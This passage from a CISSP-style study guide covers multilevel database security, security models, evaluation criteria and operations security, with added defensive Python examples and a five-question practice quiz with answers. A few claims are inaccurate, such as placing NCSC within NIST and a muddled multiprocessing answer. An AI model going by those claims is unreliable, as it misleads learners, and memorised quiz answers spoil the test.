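UNCLASSIFIED, CONFIDENTIAL, SECRET, TOP_SECRET = 0, 1, 2, 3


class PolyinstantiatedTable:
    def __init__(self):
        # primary key -> {level -> row}; several rows may share one key
        self._rows = {}

    def insert(self, key, level, row):
        self._rows.setdefault(key, {})[level] = dict(row)

    def select(self, key, clearance):
        """Return the highest-classified instance the subject may read,
        or None if no instance at or below the clearance exists."""
        instances = self._rows.get(key, {})
        visible = [lvl for lvl in instances if lvl <= clearance]
        if not visible:
            return None
        return instances[max(visible)]

    def update(self, key, level, row):
        """A write at one level only touches that level's instance; other
        instances of the same key are neither changed nor revealed."""
        self.insert(key, level, row)


def demo():
    t = PolyinstantiatedTable()
    # constructed sample: one vessel, two cover stories for its cargo
    t.insert("SS-Liberty", UNCLASSIFIED, {"cargo": "grain", "dest": "Lisbon"})
    t.insert("SS-Liberty", TOP_SECRET, {"cargo": "electronics", "dest": "Riga"})
    # a CONFIDENTIAL user rewrites "their" row; the TOP SECRET row is untouched
    t.update("SS-Liberty", CONFIDENTIAL, {"cargo": "grain", "dest": "Porto"})
    return {
        "low_view": t.select("SS-Liberty", CONFIDENTIAL),
        "high_view": t.select("SS-Liberty", TOP_SECRET),
        "unknown_key": t.select("SS-Nothing", TOP_SECRET),
    }


if __name__ == "__main__":
    print(demo())
```

Without polyinstantiation the low user's insert of a key that already exists at TOP SECRET would either fail (revealing the hidden row) or overwrite it; keeping the instances side by side avoids both.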
Inference and aggregation

Inference and aggregation occur when a user is able to use lower-level access to learn restricted information. These issues occur in multiple realms, including database security.

Inference requires deduction: there is a mystery to be solved, and lower-level details provide the clues. Aggregation is a mathematical process: a user asks every question, receives every answer, and derives restricted information.

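The inference controls mentioned above are easier to grasp in code. The following is an added example (not from the study guide): a small statistical database over a constructed salary table that answers only aggregate queries, refuses query sets that are too small or too large, and refuses a query whose set differs from an already-answered set by exactly one record, which is the simplest case of aggregating permitted answers to infer one person's value. The record names, the `k` threshold and the class name are assumptions of the example.

```python
"""Query-set-size and overlap controls for a statistical database.

Added example (not from the study guide). The database releases only
sums over sets of records. Two controls are applied to every query:
  1. the query set must contain at least k and at most N-k records;
  2. the query set must not differ from an earlier answered set by one
     record, since subtracting the two sums would isolate that record.
"""
# constructed sample records: (name, department, salary)
RECORDS = [
    ("alice", "eng", 120),
    ("bob", "eng", 100),
    ("carol", "eng", 110),
    ("dave", "ops", 90),
    ("erin", "ops", 95),
    ("frank", "sales", 80),
]


class InferenceControlledDB:
    def __init__(self, records, k=2):
        self.records = list(records)
        self.k = k                 # minimum (and N-k maximum) query-set size
        self.answered = []         # query sets whose sums have been released

    def sum_salary(self, predicate):
        """Return SUM(salary) over records matching predicate(name, dept),
        or raise PermissionError if the answer could isolate one record."""
        qset = frozenset(name for name, dept, _ in self.records if predicate(name, dept))
        n = len(self.records)
        if len(qset) < self.k or len(qset) > n - self.k:
            raise PermissionError("query set too small or too large")
        for prev in self.answered:
            if len(qset ^ prev) == 1:      # symmetric difference of one record
                raise PermissionError("query overlaps an earlier answer by one record")
        self.answered.append(qset)
        return sum(sal for name, _, sal in self.records if name in qset)


def demo():
    db = InferenceControlledDB(RECORDS, k=2)
    out = {"eng_total": db.sum_salary(lambda n, d: d == "eng")}        # 330
    try:                                                              # set of size 1
        db.sum_salary(lambda n, d: n == "alice")
        out["single"] = "answered"
    except PermissionError:
        out["single"] = "refused"
    try:                                                              # eng minus alice
        db.sum_salary(lambda n, d: d == "eng" and n != "alice")
        out["all_but_one"] = "answered"
    except PermissionError:
        out["all_but_one"] = "refused"
    out["ops_total"] = db.sum_salary(lambda n, d: d == "ops")           # 185
    return out


if __name__ == "__main__":
    print(demo())
```

The size check alone would have allowed the third query (two records), and the difference of the two permitted sums would then have revealed alice's salary; the overlap check is what blocks that aggregation. Longer chains of queries need stronger controls (query auditing, random perturbation of answers), which this example does not attempt.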
SECURITY MODELS

Now that we understand the logical, hardware, and software components required to have secure systems, and the risk posed to those systems by vulnerabilities and threats, security models provide rules for securely operating those systems.

Bell-LaPadula model

The Bell-LaPadula model was originally developed for the U.S. Department of Defense. It is focused on maintaining the confidentiality of objects. Protecting confidentiality means not allowing users at a lower security level to access objects at a higher security level.

Fast Facts
Bell-LaPadula includes the following rules and properties:
Simple Security Property: "no read up": a subject at a specific classification level cannot read an object at a higher classification level. Subjects with a Secret clearance cannot access Top Secret objects, for example.
* Security Property: "no write down": a subject at a higher classification level cannot write to a lower classification level. For example, subjects who are logged into a Top Secret system cannot send emails to a Secret system.
Strong Tranquility Property: security labels will not change while the system is operating.
Weak Tranquility Property: security labels will not change in a way that conflicts with defined security properties.

Lattice-based access controls

Lattice-based access control allows security controls for complex environments. For every relationship between a subject and an object, there are defined upper and lower access limits implemented by the system. This lattice, which allows reaching higher and lower data classification, depends on the need of the subject, the label of the object, and the role the subject has been assigned. Subjects have a Least Upper Bound (LUB) and Greatest Lower Bound (GLB) of access to the objects based on their lattice position.

Integrity models

Models such as Bell-LaPadula focus on confidentiality, sometimes at the expense of integrity. The Bell-LaPadula "no write down" rule means subjects can write up: a Secret subject can write to a Top Secret object. What if the Secret subject writes erroneous information to a Top Secret object? Integrity models such as Biba address this issue.

Biba model

While many governments are primarily concerned with confidentiality, most businesses desire to ensure that the integrity of the information is protected at the highest level. Biba is the model of choice when integrity protection is vital.

Fast Facts
The Biba model has two primary rules: the Simple Integrity Axiom and the * Integrity Axiom:
Simple Integrity Axiom: "no read down": a subject at a specific classification level cannot read data at a lower classification. This prevents subjects from accessing information at a lower integrity level. This protects integrity by preventing bad information from moving up from lower integrity levels.
* Integrity Axiom: "no write up": a subject at a specific classification level cannot write data to a higher classification. This prevents subjects from passing information up to a higher integrity level than they have clearance to change. This protects integrity by preventing bad information from moving up to higher integrity levels.

Biba is often used where integrity is more important than confidentiality. Examples include time and location-based information.

Did You Know?
Biba takes the Bell-LaPadula rules and reverses them, showing how confidentiality and integrity are often at odds. If you understand Bell-LaPadula (no read up; no write down), you can extrapolate Biba by reversing the rules: no read down; no write up.

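The lattice, Bell-LaPadula and Biba sections above all rest on one relation, label dominance, so a single added example serves all three (this is illustrative code, not from the study guide or any reference monitor). A label is a hierarchical level plus a set of compartments; LUB and GLB are computed from that ordering, and each Bell-LaPadula and Biba rule is a dominance test in one direction or the other. The level names, compartment names (`NUC`, `CRYPTO`) and function names are assumptions of the example.

```python
"""Lattice labels with the Bell-LaPadula and Biba rules.

Added example (not from the study guide). Label A dominates label B when
A's level is at least B's level and A's compartments include all of B's.
LUB and GLB follow from that ordering; the BLP and Biba properties are the
same dominance test pointed in opposite directions.
"""
from dataclasses import dataclass, field

LEVELS = {"UNCLASSIFIED": 0, "CONFIDENTIAL": 1, "SECRET": 2, "TOP SECRET": 3}
LEVEL_NAMES = {v: k for k, v in LEVELS.items()}


@dataclass(frozen=True)
class Label:
    level: str
    compartments: frozenset = field(default_factory=frozenset)

    def dominates(self, other):
        return (LEVELS[self.level] >= LEVELS[other.level]
                and self.compartments >= other.compartments)


def lub(a, b):
    """Least upper bound: the lowest label that dominates both a and b."""
    return Label(LEVEL_NAMES[max(LEVELS[a.level], LEVELS[b.level])],
                 a.compartments | b.compartments)


def glb(a, b):
    """Greatest lower bound: the highest label dominated by both a and b."""
    return Label(LEVEL_NAMES[min(LEVELS[a.level], LEVELS[b.level])],
                 a.compartments & b.compartments)


# Bell-LaPadula: labels express confidentiality; the subject's is a clearance.
def blp_can_read(subject, obj):
    """Simple Security Property, "no read up"."""
    return subject.dominates(obj)


def blp_can_write(subject, obj):
    """* Security Property, "no write down"."""
    return obj.dominates(subject)


# Biba: the same labels now express integrity (trustworthiness).
def biba_can_read(subject, obj):
    """Simple Integrity Axiom, "no read down"."""
    return obj.dominates(subject)


def biba_can_write(subject, obj):
    """* Integrity Axiom, "no write up"."""
    return subject.dominates(obj)


def demo():
    secret_nuc = Label("SECRET", frozenset({"NUC"}))
    secret_crypto = Label("SECRET", frozenset({"CRYPTO"}))
    ts_nuc = Label("TOP SECRET", frozenset({"NUC"}))
    return {
        "lub": lub(secret_nuc, secret_crypto),           # SECRET {NUC, CRYPTO}
        "glb": glb(secret_nuc, secret_crypto),           # SECRET {}
        "blp_secret_reads_ts": blp_can_read(secret_nuc, ts_nuc),    # False
        "blp_secret_writes_ts": blp_can_write(secret_nuc, ts_nuc),  # True
        "biba_secret_reads_ts": biba_can_read(secret_nuc, ts_nuc),  # True
        "biba_secret_writes_ts": biba_can_write(secret_nuc, ts_nuc),  # False
        "blp_nuc_reads_crypto": blp_can_read(secret_nuc, secret_crypto),  # False
    }


if __name__ == "__main__":
    print(demo())
```

The last entry in `demo` shows why the lattice matters beyond the plain hierarchy: two SECRET labels with disjoint compartments are incomparable, so neither may read the other even though their levels are equal.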
Clark-Wilson

Clark-Wilson is a real-world integrity model that protects integrity by requiring subjects to access objects via programs. Because the programs have specific limitations to what they can and cannot do to objects, Clark-Wilson effectively limits the capabilities of the subject. Clark-Wilson uses two primary concepts to ensure that security policy is enforced: well-formed transactions and separation of duties. The concept of well-formed transactions provides integrity. The process is comprised of the access control triple: user, transformation procedure, and constrained data item.

Chinese Wall model

The Chinese Wall model (also known as Brewer-Nash) is designed to avoid conflicts of interest by prohibiting one person, such as a consultant, from accessing multiple conflict of interest categories (CoIs).

Access control matrix

An access control matrix is a table defining what access permissions exist between specific subjects and objects. A matrix is a data structure that acts as a table lookup for the operating system. The rows of the table show the capabilities of each subject; each row is called a capability list. The columns of the table show the ACL for each object or application.

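An added example (not from the study guide) of the matrix and its two projections: the same cells are stored once, a row read out is a subject's capability list, a column read out is an object's ACL, and an authorization check reads one cell. The subject, object and right names are constructed for the example.

```python
"""Access control matrix with capability-list and ACL projections.

Added example (not from the study guide). Cells are keyed by
(subject, object) and hold a set of rights; the row and column views are
derived from the same data, so a capability list and an ACL always agree.
"""


class AccessControlMatrix:
    def __init__(self):
        self._cells = {}          # (subject, object) -> set of rights

    def grant(self, subject, obj, *rights):
        self._cells.setdefault((subject, obj), set()).update(rights)

    def revoke(self, subject, obj, *rights):
        cell = self._cells.get((subject, obj), set())
        cell.difference_update(rights)
        if not cell:                          # drop empty cells entirely
            self._cells.pop((subject, obj), None)

    def check(self, subject, obj, right):
        """The operating system's lookup: one cell, one right."""
        return right in self._cells.get((subject, obj), ())

    def capability_list(self, subject):
        """Row view: every object this subject may touch, and how."""
        return {o: frozenset(r) for (s, o), r in self._cells.items() if s == subject}

    def acl(self, obj):
        """Column view: every subject that may touch this object, and how."""
        return {s: frozenset(r) for (s, o), r in self._cells.items() if o == obj}

    def subjects_with(self, obj, right):
        """'Who can write X?' is answered from the column, not the rows."""
        return sorted(s for s, rights in self.acl(obj).items() if right in rights)


def demo():
    m = AccessControlMatrix()
    m.grant("alice", "payroll.db", "read", "write")
    m.grant("bob", "payroll.db", "read")
    m.grant("bob", "backup.sh", "execute")
    m.revoke("alice", "payroll.db", "write")  # least privilege: drop a right
    return {
        "alice_caps": m.capability_list("alice"),
        "payroll_acl": m.acl("payroll.db"),
        "writers": m.subjects_with("payroll.db", "write"),
        "bob_exec": m.check("bob", "backup.sh", "execute"),
    }


if __name__ == "__main__":
    print(demo())
```

Real systems rarely store the full matrix (it is sparse); they keep either the columns (ACLs, as in file systems) or the rows (capabilities), and the projection functions above show what each choice makes cheap to answer.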
EVALUATION METHODS, CERTIFICATION, AND ACCREDITATION

Evaluation methods and criteria are designed to gauge the real-world security of systems and products. The Trusted Computer System Evaluation Criteria (TCSEC, aka the Orange Book) is the granddaddy of evaluation models, developed by the U.S. Department of Defense in the 1980s. Other international models have followed, including ITSEC and the Common Criteria.

The Orange Book

The National Computer Security Center (NCSC), part of the National Institute of Standards and Technology (NIST), with help from the National Security Agency (NSA) developed the Trusted Computer System Evaluation Criteria (TCSEC), which is also known as the Orange Book. It was one of the first security standards implemented and major portions of those standards are still used today in the form of U.S. Government Protection Profiles within the International Common Criteria framework.

Fast Facts
The divisions of TCSEC:
D: Minimal protection. This division describes TCSEC-evaluated systems that do not meet the requirements of higher divisions (C through A).
C: Discretionary protection. Discretionary means discretionary access control systems (DAC).
B: Mandatory protection. Mandatory means mandatory access control systems (MAC).
A: Verified protection. Includes all requirements of B, plus additional controls.

ITSEC

The European Information Technology Security Evaluation Criteria (ITSEC) was the first successful international evaluation model. It refers to TCSEC Orange Book levels, separating functionality (F, how well a system works) from assurance (the ability to evaluate the security of a system). There are two types of assurance: effectiveness (Q) and correctness (E).

Assurance correctness ratings range from E0 (inadequate) to E6 (formal model of security policy); functionality ratings include TCSEC-equivalent ratings (F-C1, F-C2, etc.).

Fast Facts
The equivalent ITSEC/TCSEC ratings are:
E0: D
F-C1, E1: C1
F-C2, E2: C2
F-B1, E3: B1
F-B2, E4: B2
F-B3, E5: B3
F-B3, E6: A1

The International Common Criteria

The International Common Criteria is an internationally agreed-upon standard for describing and testing the security of IT products. It presents a hierarchy of requirements for a range of classifications and systems.

Crunch Time
The Common Criteria uses specific terms when defining specific portions of the testing process:
Target of Evaluation (TOE): the system or product that is being evaluated
Security Target (ST): the documentation describing the TOE, including the security requirements and operational environment
Protection Profile (PP): an independent set of security requirements and objectives for a specific category of products or systems, such as firewalls or intrusion detection systems
Evaluation Assurance Level (EAL): the evaluation score of the tested product or system

Levels of evaluation

Within the Common Criteria, there are seven EALs, each building upon the previous level. For example, EAL3-rated products can be expected to meet or exceed the requirements of products rated EAL1 or EAL2.

Fast Facts
The Common Criteria levels are:
EAL1: Functionally tested
EAL2: Structurally tested
EAL3: Methodically tested and checked
EAL4: Methodically designed, tested, and reviewed
EAL5: Semiformally designed and tested
EAL6: Semiformally verified, designed, and tested
EAL7: Formally verified, designed, and tested [2]

2. The Common Criteria for Information Security Technology. http://www.commoncriteriaportal.org/files/ccfiles/CCPART1V3.1R3.pdf [accessed June 26, 2013].

PCI-DSS

The Payment Card Industry Data Security Standard (PCI-DSS) is a security standard created by the Payment Card Industry Security Standards Council (PCI-SSC). The council is comprised of American Express, Discover, MasterCard, Visa, and others. PCI-DSS seeks to protect credit cards by requiring vendors using them to take specific security precautions.

Certification and Accreditation

Certification means a system has been certified to meet the security requirements of the data owner. Certification considers the system, the security measures taken to protect the system, and the residual risk represented by the system. Accreditation is the data owner's acceptance of the Certification, and of the residual risk, required before the system is put into production.

Summary of exam objectives

The Security Architecture and Design domain discussed the fundamental building blocks of secure computer systems, including concepts such as the ring model, layering, and abstraction. We discussed secure hardware, including the CPU, computer bus, RAM, and ROM. Secure software includes the kernel, reference monitor, and operating system. We use all of these together to build a secure computer system.

Once built, we learned ways to securely operate the system, including models such as the Bell-LaPadula confidentiality model and the Biba integrity model, as well as modes of operation including dedicated, system high, compartmented, and multilevel secure. Finally, we learned of ways to determine assurance: proof that our systems really are secure. Evaluation models ranged from TCSEC, to ITSEC, to the Common Criteria, and beyond.

TOP FIVE TOUGHEST QUESTIONS

1. What type of memory is used often for CPU registers?
A. DRAM
B. Firmware
C. ROM
D. SRAM

2. Which type of cloud service level would Linux hosting be offered under?
A. LaaS
B. SaaS
C. IaaS
D. PaaS

3. You are surfing the Web via a wireless network. Your wireless connection becomes unreliable, so you plug into a wired network to continue surfing. While you changed physical networks, your browser required no change. What security feature allows this?
A. Abstraction
B. Hardware segmentation
C. Layering
D. Process isolation

4. What type of system runs multiple programs simultaneously on multiple CPUs?
A. Multiprocessing
B. Multiprogramming
C. Multitasking
D. Multithreading

5. An attacker deduces that an organization is holding an offsite meeting and has few people in the building, based on the low traffic volume to and from the parking lot, and uses the opportunity to break into the building to steal laptops. What type of attack has been launched?
A. Aggregation
B. Emanations
C. Inference
D. Maintenance Hook

ANSWERS

1. Correct answer and explanation: D. Answer D is correct; SRAM (Static Random Access Memory) is fast and expensive, often used for cache memory, including CPU registers.
Incorrect answers and explanations: A, B, and C. Answers A, B, and C are incorrect. DRAM is slower and less expensive than SRAM, often used as main RAM. Firmware is a technology used by PLDs such as EEPROMs. Read Only Memory is a type of Firmware, providing nonvolatile memory for uses such as the BIOS.

2. Correct answer and explanation: C. Answer C is correct; IaaS (Infrastructure as a Service) provides an entire virtualized operating system, which the customer configures from the OS on up.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect. LaaS is a distracter answer. SaaS (Software as a Service) is completely configured, from the operating system to applications, and the customer simply uses the application. PaaS (Platform as a Service) provides a preconfigured operating system, and the customer configures the applications.

3. Correct answer and explanation: C. Answer C is correct; layering means a change in one layer (hardware) has no direct effect on a nonadjacent layer (application).
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect. Abstraction hides unnecessary details from the user, which is related to (but different from) layering. Hardware segmentation provides dedicated hardware or portions of hardware to specific security domains. Process isolation prevents one process from affecting the confidentiality, integrity, or availability of another.

4. Correct answer and explanation: A. Answer A is correct; multiprocessing systems run multiple programs or processes per CPU. Two types are Symmetric Multiprocessing (SMP) and Asymmetric Multiprocessing (AMP).
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are incorrect. All use one CPU. Multiprogramming runs multiple programs simultaneously on one CPU; multitasking runs multiple tasks simultaneously on one CPU, and multithreading runs multiple threads simultaneously on one CPU.

5. Correct answer and explanation: C. Answer C is correct; inference requires an attacker to "fill in the blanks," and deduce sensitive information from public information.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect. Aggregation is a mathematical operation where all questions are asked and all answers are received: there is no deduction required. Emanations are energy broadcast from electronic equipment. Maintenance Hooks are system maintenance backdoors left by vendors.

1. Information Technology Security Evaluation Criteria (ITSEC) Provisional Harmonised Criteria. http://www.ssi.gouv.fr/site_documents/ITSEC/ITSEC-uk.pdf [accessed June 26, 2013].


CHAPTER 7

Domain 7: Operations Security

Abstract
This chapter represents Domain 7 of the CISSP, Operations Security. A significant emphasis of the domain and chapter is general administrative security matters. Key aspects of administrative security include data classification, separation of duties, rotation of duties, nondisclosure agreements (NDA), and background checks. Another focus of this domain is on asset management, which includes consideration of both configuration and change management. Continuity of operations is also presented in this chapter with discussions of different methods trying to ensure availability through highly available systems, Redundant Array of Inexpensive Disks (RAID), and Service Level Agreements (SLA). A methodology and discussion about incident response is the final focus of the Operations Security domain.

KEYWORDS
Collusion; Subject; Object; Label; Full backup; Incremental backup; Differential backup; Clearance; Remanence; Redundant Array of Inexpensive Disks (RAID); Mirroring; Striping

Exam Objectives in This Chapter

Administrative Security
Sensitive Information/Media Security
Asset Management
Continuity of Operations
Incident Response Management

Introduction

Operations security is concerned with threats to a production operating environment. Threat agents can be internal or external actors, and operations security must account for both of these threat sources in order to be effective. Operations security is about people, data, media, hardware, and the threats associated with each of these in a production environment.

ADMINISTRATIVE SECURITY

A fundamental aspect of operations security is ensuring that controls are in place to inhibit people either inadvertently or intentionally compromising the confidentiality, integrity, or availability of data or the systems and media holding that data. Administrative security provides the means to control people's operational access to data.

Labels

Objects have labels and subjects have clearances. The object labels used by many world governments are confidential, secret, and top secret. According to Executive Order 12356, National Security Information:
"Top Secret" shall be applied to information, the unauthorized disclosure of which reasonably could be expected to cause exceptionally grave damage to the national security.
"Secret" shall be applied to information, the unauthorized disclosure of which reasonably could be expected to cause serious damage to the national security.
"Confidential" shall be applied to information, the unauthorized disclosure of which reasonably could be expected to cause damage to the national security.

Private sector companies use labels such as "Internal Use Only" and "Company Proprietary."

Clearance

A clearance is a determination concerning whether or not a user can be trusted with a specific level of information. Clearances must determine the subject's current and potential future trustworthiness; the latter is harder (and more expensive) to assess. Are there any issues, such as debt or drug or alcohol abuse, which could lead an otherwise ethical person to violate their ethics? Is there a personal secret that could be used to blackmail this person? Some higher-level clearances include access to compartmented information. Compartmentalization is a technical method for enforcing need to know.

Separation of duties

Separation of duties (also called segregation of duties) allows an organization to maintain checks and balances among the employees with privileged access. By having more than one individual perform part of a sensitive transaction, each person involved is supervising the other when access is granted and used. No one person should have total control of a sensitive transaction. As the role becomes more sensitive, separation of duties should be implemented more stringently. For example, administration of a nuclear weapons system should require many people's oversight and completion of duties.

Rotation of duties

Rotation of duties describes a process that requires different staff members to perform the same duty. By rotating those staff members, the organization protects itself by having these varying staff members perform and review the work of their peers who performed the same work during the last rotation. Rotation of duties helps mitigate collusion, where two or more people work to subvert the security of a system. Rotation of duties can serve as either a detective or deterrent control: the fear of being caught may deter someone from committing fraud; the rotation may detect fraud that has already occurred.

Mandatory leave/forced vacation

An additional operational control that is closely related to rotation of duties is that of mandatory leave, also known as forced vacation. Though there are various justifications for requiring employees to be away from work, the primary security considerations are similar to those addressed by rotation of duties: reducing or detecting personnel single points of failure, and detection and deterrence of fraud.

Nondisclosure agreement

A nondisclosure agreement (NDA) is a work-related contractual agreement that ensures that, prior to being given access to sensitive information or data, an individual or organization appreciates their legal responsibility to maintain the confidentiality of sensitive information. Job candidates, consultants, or contractors often sign nondisclosure agreements before they are hired. Nondisclosure agreements are largely a directive control.

Background checks

Background checks (also known as background investigations or preemployment screening) are an additional directive control. The majority of background investigations are performed as part of a preemployment screening process. Some organizations perform cursory background investigations that include a criminal record check. Others perform more in-depth checks, such as verifying employment history, obtaining credit reports, and in some cases requiring the submission of a drug screening.

SENSITIVE INFORMATION/MEDIA SECURITY

Though security and controls related to the people within an enterprise are vitally important, so is having a regimented process for handling sensitive information, including media security. This section discusses concepts that are an important component of a strong overall information security posture.

Sensitive information

Sensitive information requires protection, and that information physically resides on some form of media. In addition to primary storage, backup storage must also be considered. It is also likely that sensitive information is transferred, whether internally or externally, for use. Wherever the data exists, there must be processes that ensure the data is not destroyed or inaccessible (a breach of availability), disclosed (a breach of confidentiality), or altered (a breach of integrity).

Labeling/marking

Perhaps the most important step in media security is the process of locating sensitive information and labeling or marking it as sensitive. How the data is labeled should correspond to the organizational data classification scheme.

Handling

People handling sensitive media should be trusted individuals who have been vetted by the organization. They must understand their role in the organization's information security posture. Sensitive media should have strict policies regarding its handling. Policies should require the inclusion of written logs detailing the person responsible for the media. Historically, backup media has posed a significant problem for organizations.

Storage

When storing sensitive information, it is preferable to encrypt the data. Encryption of data at rest greatly reduces the likelihood of the data being disclosed in an unauthorized fashion due to media security issues. Physical storage of the media containing sensitive information should not be performed in a haphazard fashion, whether the data is encrypted or not.

Retention

Media and information have a limited useful life. Retention of sensitive information should not persist beyond the period of usefulness or legal requirement (whichever is greater), as it needlessly exposes the data to threats of disclosure when the data is no longer needed by the organization. Keep in mind there may be regulatory or other legal reasons that may compel the organization to maintain such data beyond its time of utility.

Media sanitization or destruction of data

While some data might not be sensitive and not warrant thorough data destruction measures, an organization will have data that must be verifiably destroyed or otherwise rendered nonusable in case the media on which it was housed is recovered by a third party. The process for sanitization of media or destruction of data varies directly with the type of media and sensitivity of data.

Data remanence

Data remanence is data that persists beyond noninvasive means to delete it. Though data remanence is sometimes used specifically to refer to residual data that persists on magnetic storage, remanence concerns go beyond just that of magnetic storage media.

Wiping, overwriting, or shredding

In most file systems, if a user deletes a file, the file system merely removes metadata pointers or references to the file. The file allocation table references are removed, but the file data itself remains. Significant amounts of deleted data may be recovered (undeleted); forensic tools are readily available to do so. Reformatting a file system may also leave data intact.

Though simple deletion of files or reformatting of hard disks is not sufficient to render data unrecoverable, files may be securely wiped or overwritten. Wiping, also called overwriting or shredding, writes new data over each bit or block of file data. One of the shortcomings of wiping is when hard disks become physically damaged, preventing the successful overwriting of all data.
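
The following added example (not code from the study guide or any wiping tool) shows what "writes new data over each bit or block of file data" means in practice: the file is overwritten in place once per pass, each pass is flushed to the device, and only then is the name unlinked. The pass pattern, the chunk size and the helper names are choices made for the example.

```python
"""Overwrite-then-unlink ("wiping") of a regular file.

Added example (not from the study guide). Plain deletion only removes the
metadata pointer; this helper overwrites every byte of the file's
allocated extent in each pass (fixed patterns, then random bytes), calls
fsync so the pass reaches the device, and removes the name last.
"""
import os
import stat
import tempfile

CHUNK = 64 * 1024                      # bytes written per os.write call


def wipe_file(path, passes=(b"\x00", b"\xff", None)):
    """Overwrite `path` in place once per pass (None = random bytes), then
    unlink it. Returns the total number of bytes overwritten across all
    passes. Refuses anything that is not a regular file."""
    fd = os.open(path, os.O_RDWR | getattr(os, "O_NOFOLLOW", 0))
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise ValueError("only regular files are wiped")
        size = st.st_size
        for pattern in passes:
            os.lseek(fd, 0, os.SEEK_SET)
            remaining = size
            while remaining > 0:
                n = min(CHUNK, remaining)
                buf = os.urandom(n) if pattern is None else pattern * n
                remaining -= os.write(fd, buf)   # write may be partial
            os.fsync(fd)                         # push this pass to the device
    finally:
        os.close(fd)
    os.unlink(path)
    return size * len(passes)


def demo():
    """Constructed scenario: a 16,000-byte file wiped with three passes."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "secret.txt")
        with open(path, "wb") as fh:
            fh.write(b"account numbers\n" * 1000)
        overwritten = wipe_file(path)
        return {"bytes_overwritten": overwritten,
                "still_exists": os.path.exists(path)}


if __name__ == "__main__":
    print(demo())
```

The overwrite only reaches the blocks the file currently occupies: damaged sectors (the shortcoming the text names), copy-on-write or journaling file systems that keep older copies, and flash media whose controller remaps writes can all leave the original bytes in place. That is why degaussing and physical destruction, covered next, carry higher assurance for the most sensitive media.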

Degaussing

By introducing an external magnetic field through use of a degausser, the data on magnetic storage media can be made unrecoverable. A degausser destroys the integrity of the magnetization of the storage media itself, making the data unrecoverable.

Physical destruction

Physical destruction, when carried out properly, is considered the most secure means of media sanitization. One of the reasons for the higher degree of assurance is because of the greater likelihood of errors resulting in data remanence with wiping or degaussing. Physical destruction is warranted for the most sensitive of data. Common means of destruction include incineration and pulverization.

Shredding

A simple form of media sanitization is shredding, a type of physical destruction. Though this term is sometimes used in relation to overwriting of data, here shredding refers to the process of making data printed on hard copy, or on smaller objects such as floppy or optical disks, unrecoverable. Sensitive information such as printed information needs to be shredded prior to disposal in order to thwart a dumpster diving attack. Dumpster diving is a physical attack in which a person recovers trash in hopes of finding sensitive information that has not been securely erased or destroyed.


ASSET MANAGEMENT

A holistic approach to operational information security requires organizations to focus on systems as well as the people, data, and media. Systems security is another vital component of operations security, and there are specific controls that can greatly help system security throughout the systems life cycle.

Configuration management

Basic configuration management practices associated with system security will involve tasks such as disabling unnecessary services; removing extraneous programs; enabling security capabilities such as firewalls, antivirus, and intrusion detection or prevention systems; and configuring security and audit logs.

Baselining

Security baselining is the process of capturing a point-in-time understanding of the current system security configuration. Establishing an easy means for capturing the current system security configuration can be extremely helpful in responding to a potential security incident.
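A minimal baseline capture and drift check, as an added Python example (not code from the book). It records service states and SHA-256 hashes of configuration files at a point in time, fingerprints the whole snapshot so the stored baseline can itself be integrity-checked, and reports what differs in a later snapshot, which is the question an incident responder asks first. The hosts, services, file paths and contents are constructed for the example.

```python
import hashlib
import json
from typing import Any, Dict, List


def capture_baseline(services: Dict[str, str], files: Dict[str, bytes]) -> Dict[str, Any]:
    """Point-in-time snapshot: service states plus SHA-256 of each config file's content."""
    return {
        "services": dict(services),
        "files": {path: hashlib.sha256(content).hexdigest() for path, content in files.items()},
    }


def baseline_fingerprint(baseline: Dict[str, Any]) -> str:
    """One hash over the canonical JSON form, so a stored baseline can be verified later."""
    canonical = json.dumps(baseline, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(canonical).hexdigest()


def compare(baseline: Dict[str, Any], current: Dict[str, Any]) -> Dict[str, List[str]]:
    """Report drift between the known-good snapshot and the current one."""
    drift: Dict[str, List[str]] = {"services_changed": [], "files_changed": [],
                                   "files_added": [], "files_removed": []}
    for name, state in baseline["services"].items():
        now = current["services"].get(name)
        if now != state:
            drift["services_changed"].append(f"{name}: {state} -> {now}")
    b_files, c_files = baseline["files"], current["files"]
    for path in sorted(set(b_files) | set(c_files)):
        if path not in c_files:
            drift["files_removed"].append(path)
        elif path not in b_files:
            drift["files_added"].append(path)
        elif b_files[path] != c_files[path]:
            drift["files_changed"].append(path)
    return drift


def has_drift(drift: Dict[str, List[str]]) -> bool:
    return any(drift.values())


# Constructed sample snapshots (not real hosts): the baseline taken after hardening,
# and a later snapshot in which telnet was enabled, sshd_config was loosened and a
# cron job appeared.
KNOWN_GOOD = capture_baseline(
    {"sshd": "enabled", "telnet": "disabled", "auditd": "enabled"},
    {"/etc/ssh/sshd_config": b"PermitRootLogin no\nPasswordAuthentication no\n",
     "/etc/audit/auditd.conf": b"log_format = ENRICHED\n"},
)
LATER = capture_baseline(
    {"sshd": "enabled", "telnet": "enabled", "auditd": "enabled"},
    {"/etc/ssh/sshd_config": b"PermitRootLogin yes\nPasswordAuthentication no\n",
     "/etc/audit/auditd.conf": b"log_format = ENRICHED\n",
     "/etc/cron.d/backup-job": b"0 2 * * * root /usr/local/bin/backup\n"},
)

if __name__ == "__main__":
    print(json.dumps(compare(KNOWN_GOOD, LATER), indent=2))
```

Storing the fingerprint separately from the baseline (for example in the change record) lets the responder confirm the baseline itself was not altered before trusting the drift report.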
Vulnerability management

Vulnerability scanning is a way to discover poor configurations and missing patches in an environment. The term vulnerability management is used rather than just vulnerability scanning to emphasize the need for management of the vulnerability information. The remediation or mitigation of vulnerabilities should be prioritized based on both risk to the organization and ease of remediation procedures.

Zero-day vulnerabilities and zero-day exploits

A zero-day vulnerability is a vulnerability that is known before the existence of a patch. Zero-day vulnerabilities, also commonly written 0-day, are becoming increasingly important as attackers are becoming more skilled in discovery, and disclosure of zero-day vulnerabilities is being monetized. A zero-day exploit, rather than vulnerability, refers to the existence of exploit code for a vulnerability that has yet to be patched.

Change management

In order to maintain consistent and known operations security, a regimented change management or change control process needs to be followed. The purpose of the change control process is to understand, communicate, and document any changes with the primary goal of being able to understand, control, and avoid direct or indirect negative impact that the change might impose.

Fast Facts
Because of the variability of the change management process, specific named phases have not been offered in this section. However, the general flow of the change management process includes:
Identifying a change
Proposing a change
Assessing the risk associated with the change
Testing the change
